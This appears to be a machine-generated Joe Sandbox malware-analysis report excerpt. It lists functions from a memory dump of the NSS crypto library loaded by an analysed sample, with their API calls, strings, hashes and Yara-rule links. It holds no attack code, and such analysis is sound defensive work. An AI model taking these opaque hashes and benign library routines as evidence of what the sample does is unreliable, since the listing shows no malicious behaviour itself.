                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                                                                                                                                                                                                                          • Instruction ID: bf67c7c886cc10d0fababfcce10b1db8ddf49dfc0c23d7f70504a37657b37914
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CAE0927A302056ABDB148E09C555AA97359DF81729FB4807DCC5E9FA01DB33F84387C2
                                                                                                                                                                                                                                                                                          Function 6C6ECC60 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 86cb185a8532da3f25415ac7ccdff31320d5f8d6ee01ef0e6e66b71fc62e03b2
                                                                                                                                                                                                                                                                                          • Instruction ID: f4a702cb226efa1664882f5257cddcdd5b15717a8459a12a50edc9d2831fc5c4
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 86cb185a8532da3f25415ac7ccdff31320d5f8d6ee01ef0e6e66b71fc62e03b2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7FC04838244608CFC784DA08E4899A53BA8AB8961079400A4EA068B722EA61F810CA80
                                                                                                                                                                                                                                                                                          Function 6C721D60 Relevance: 84.2, APIs: 1, Strings: 47, Instructions: 210COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( rv = %s,CKR_FUNCTION_REJECTED,?,6C721D46), ref: 6C722345
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Print
                                                                                                                                                                                                                                                                                          • String ID: rv = %s$ rv = 0x%x$CKR_BUFFER_TOO_SMALL$CKR_CRYPTOKI_ALREADY_INITIALIZED$CKR_CRYPTOKI_NOT_INITIALIZED$CKR_CURVE_NOT_SUPPORTED$CKR_DEVICE_ERROR$CKR_DEVICE_MEMORY$CKR_DEVICE_REMOVED$CKR_DOMAIN_PARAMS_INVALID$CKR_ENCRYPTED_DATA_INVALID$CKR_ENCRYPTED_DATA_LEN_RANGE$CKR_FUNCTION_CANCELED$CKR_FUNCTION_NOT_PARALLEL$CKR_FUNCTION_REJECTED$CKR_INFORMATION_SENSITIVE$CKR_MUTEX_BAD$CKR_MUTEX_NOT_LOCKED$CKR_NEW_PIN_MODE$CKR_NEXT_OTP$CKR_OBJECT_HANDLE_INVALID$CKR_OK$CKR_OPERATION_ACTIVE$CKR_OPERATION_CANCEL_FAILED$CKR_OPERATION_NOT_INITIALIZED$CKR_PIN_EXPIRED$CKR_PIN_INCORRECT$CKR_PIN_INVALID$CKR_PIN_LEN_RANGE$CKR_PIN_LOCKED$CKR_RANDOM_NO_RNG$CKR_RANDOM_SEED_NOT_SUPPORTED$CKR_SAVED_STATE_INVALID$CKR_SIGNATURE_INVALID$CKR_SIGNATURE_LEN_RANGE$CKR_STATE_UNSAVEABLE$CKR_TEMPLATE_INCOMPLETE$CKR_TEMPLATE_INCONSISTENT$CKR_TOKEN_NOT_PRESENT$CKR_TOKEN_NOT_RECOGNIZED$CKR_TOKEN_RESOURCE_EXCEEDED$CKR_TOKEN_WRITE_PROTECTED$CKR_WRAPPED_KEY_INVALID$CKR_WRAPPED_KEY_LEN_RANGE$CKR_WRAPPING_KEY_HANDLE_INVALID$CKR_WRAPPING_KEY_SIZE_RANGE$CKR_WRAPPING_KEY_TYPE_INCONSISTENT
                                                                                                                                                                                                                                                                                          • API String ID: 3558298466-1980531169
                                                                                                                                                                                                                                                                                          • Opcode ID: 500599c113fced6eaef957f49882b204c175bcee4af2264f8b443dd8dfb34d20
                                                                                                                                                                                                                                                                                          • Instruction ID: c4e000c7fe2d0acd3a81af369be76516de9b2deb2a00a68834784f835063ae46
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 500599c113fced6eaef957f49882b204c175bcee4af2264f8b443dd8dfb34d20
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D61392066E164C7D73C448C876D36C2164A783334FE0B93BE5458EE56C6BECE4A46D3
                                                                                                                                                                                                                                                                                          Function 6C755DE0 Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 272COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6C755E08
                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C755E3F
                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6C755E5C
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C755E7E
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C755E97
                                                                                                                                                                                                                                                                                          • PORT_Strdup_Util.NSS3(secmod.db), ref: 6C755EA5
                                                                                                                                                                                                                                                                                          • _NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6C755EBB
                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C755ECB
                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6C755EF0
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C755F12
                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C755F35
                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6C755F5B
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C755F82
                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6C755FA3
                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6C755FB7
                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C755FC4
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C755FDB
                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C755FE9
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C755FFE
                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C75600C
                                                                                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C756027
                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6C75605A
                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(6C82AAF9,00000000), ref: 6C75606A
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C75607C
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C75609A
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C7560B2
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C7560CE
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
                                                                                                                                                                                                                                                                                          • String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
                                                                                                                                                                                                                                                                                          • API String ID: 1427204090-154007103
                                                                                                                                                                                                                                                                                          • Opcode ID: 28c187e0c454ca145f0cd391da30f922a3e8a0606499d49aa0d1d007fe8c9412
                                                                                                                                                                                                                                                                                          • Instruction ID: b62860e0c45ad09cea9ec7f02265b235a21927b222d1d974a30c6130c6f49ff9
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28c187e0c454ca145f0cd391da30f922a3e8a0606499d49aa0d1d007fe8c9412
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC910AF0A042455BEF519F24EE49BAA3BA89F0524CF880470EC19DBB42EF36D564C7E1
                                                                                                                                                                                                                                                                                          Function 6C6E1D90 Relevance: 45.7, APIs: 16, Strings: 10, Instructions: 182filestringCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C6E1DA3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B98D0: calloc.MOZGLUE(00000001,00000084,6C6E0936,00000001,?,6C6E102C), ref: 6C7B98E5
                                                                                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6C6E1DB2
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E1240: TlsGetValue.KERNEL32(00000040,?,6C6E116C,NSPR_LOG_MODULES), ref: 6C6E1267
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E1240: EnterCriticalSection.KERNEL32(?,?,?,6C6E116C,NSPR_LOG_MODULES), ref: 6C6E127C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C6E116C,NSPR_LOG_MODULES), ref: 6C6E1291
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E1240: PR_Unlock.NSS3(?,?,?,?,6C6E116C,NSPR_LOG_MODULES), ref: 6C6E12A0
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6E1DD8
                                                                                                                                                                                                                                                                                          • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6C6E1E4F
                                                                                                                                                                                                                                                                                          • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6C6E1EA4
                                                                                                                                                                                                                                                                                          • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6C6E1ECD
                                                                                                                                                                                                                                                                                          • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6C6E1EEF
                                                                                                                                                                                                                                                                                          • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6C6E1F17
                                                                                                                                                                                                                                                                                          • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C6E1F34
                                                                                                                                                                                                                                                                                          • PR_SetLogBuffering.NSS3(00004000), ref: 6C6E1F61
                                                                                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6C6E1F6E
                                                                                                                                                                                                                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C6E1F83
                                                                                                                                                                                                                                                                                          • PR_SetLogFile.NSS3(00000000), ref: 6C6E1FA2
                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6C6E1FB8
                                                                                                                                                                                                                                                                                          • OutputDebugStringA.KERNEL32(00000000), ref: 6C6E1FCB
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6E1FD2
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
                                                                                                                                                                                                                                                                                          • String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
                                                                                                                                                                                                                                                                                          • API String ID: 2013311973-4000297177
                                                                                                                                                                                                                                                                                          • Opcode ID: bfc565546686aabb5dc8d30d6591040abd7a3d7326edcff1716f9a5d22f87f19
                                                                                                                                                                                                                                                                                          • Instruction ID: ea86a0e875e899147217d64c2bc4cd4d803bd929504e8fa11405e727e83825b0
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bfc565546686aabb5dc8d30d6591040abd7a3d7326edcff1716f9a5d22f87f19
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD51BEB1E092089BDF10DBE4CD48B9E77F8AF0930DF04492AE8159B602E774D948DBD9
                                                                                                                                                                                                                                                                                          Function 6C7C6E50 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 213stringCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C67CA30: EnterCriticalSection.KERNEL32(?,?,?,6C6DF9C9,?,6C6DF4DA,6C6DF9C9,?,?,6C6A369A), ref: 6C67CA7A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C67CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C67CB26
                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,?,?,6C68BE66), ref: 6C7C6E81
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C68BE66), ref: 6C7C6E98
                                                                                                                                                                                                                                                                                          • sqlite3_snprintf.NSS3(?,00000000,6C82AAF9,?,?,?,?,?,?,6C68BE66), ref: 6C7C6EC9
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C68BE66), ref: 6C7C6ED2
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C68BE66), ref: 6C7C6EF8
                                                                                                                                                                                                                                                                                          • sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C68BE66), ref: 6C7C6F1F
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C68BE66), ref: 6C7C6F28
                                                                                                                                                                                                                                                                                          • sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C68BE66), ref: 6C7C6F3D
                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C68BE66), ref: 6C7C6FA6
                                                                                                                                                                                                                                                                                          • sqlite3_snprintf.NSS3(?,00000000,6C82AAF9,00000000,?,?,?,?,?,?,?,6C68BE66), ref: 6C7C6FDB
                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C68BE66), ref: 6C7C6FE4
                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C68BE66), ref: 6C7C6FEF
                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C68BE66), ref: 6C7C7014
                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,6C68BE66), ref: 6C7C701D
                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C68BE66), ref: 6C7C7030
                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C68BE66), ref: 6C7C705B
                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,6C68BE66), ref: 6C7C7079
                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C68BE66), ref: 6C7C7097
                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C68BE66), ref: 6C7C70A0
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
                                                                                                                                                                                                                                                                                          • String ID: mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                                                                                                                                                                                                                          • API String ID: 593473924-707647140
                                                                                                                                                                                                                                                                                          • Opcode ID: 37ffbd50e85ec745fa95ec251507c6c47f3282fe9a60356a772aca5a8b6d950f
                                                                                                                                                                                                                                                                                          • Instruction ID: 92431b61d715997e90202876475da9dba4a02037a1a30c5c16ae28d94986cb7d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 37ffbd50e85ec745fa95ec251507c6c47f3282fe9a60356a772aca5a8b6d950f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 785148B1B041122BE72096349D95BBB37669F8371CF144938E90596BC2FF25950EC3EB
                                                                                                                                                                                                                                                                                          Function 6C754FE0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 175COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7075C2,00000000,00000000,00000001), ref: 6C755009
                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7075C2,00000000), ref: 6C755049
                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C75505D
                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6C755071
                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6C755089
                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7550A1
                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C7550B2
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7075C2), ref: 6C7550CB
                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7550D9
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7550F5
                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C755103
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C75511D
                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C75512B
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C755145
                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C755153
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C75516D
                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C75517B
                                                                                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C755195
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
                                                                                                                                                                                                                                                                                          • String ID: config=$library=$name=$nss=$parameters=
                                                                                                                                                                                                                                                                                          • API String ID: 391827415-203331871
                                                                                                                                                                                                                                                                                          • Opcode ID: 266517eed833efcb86479a4aad931f0def2eafaaf0d077af011f71bcc551e6ac
                                                                                                                                                                                                                                                                                          • Instruction ID: c50b79d6d20fcde7e9b2ed856dc1869bb694d25254ff504e38d8da9111005202
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 266517eed833efcb86479a4aad931f0def2eafaaf0d077af011f71bcc551e6ac
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8651E7B1A011159BEB90DF20EE44AAF37A89F1624CF540434EC19E7741EF25E929C7F2
                                                                                                                                                                                                                                                                                          Function 6C728E50 Relevance: 40.4, APIs: 14, Strings: 9, Instructions: 169COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(C_WrapKey), ref: 6C728E76
                                                                                                                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C728EA4
                                                                                                                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C728EB3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C80D930: PL_strncpyz.NSS3(?,?,?), ref: 6C80D963
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C728EC9
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C728EE5
                                                                                                                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6C728F17
                                                                                                                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C728F29
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C728F3F
